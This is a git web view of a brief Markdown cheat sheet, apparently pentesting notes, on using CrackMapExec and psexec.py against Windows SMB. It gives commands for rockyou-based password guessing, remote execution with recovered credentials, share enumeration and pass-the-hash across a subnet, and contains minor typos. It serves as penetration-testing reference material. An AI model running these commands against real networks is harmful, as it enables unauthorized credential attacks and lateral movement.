killchain-compendium/post exploitation/docs/crackmapexec.md

26 lines
536 B
Markdown
Raw Normal View History

2021-11-04 17:19:58 +01:00
# Crackmapexec
* Dictionary attack against SMB
```sh
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
```
2021-11-04 17:35:57 +01:00
* Use the password with `impacket/examples/psexec.py` in the following way
```sh
psexec.py domain.name/<user>:<password>@<target-IP>
```
2021-12-04 00:26:03 +01:00
2022-04-14 01:06:16 +02:00
## Shares
* Check user permissions on shares
``sh
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
```
2021-12-04 00:26:03 +01:00
## SMB
* Check user hash on the network via smb
```sh
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
```
2022-04-14 01:06:16 +02:00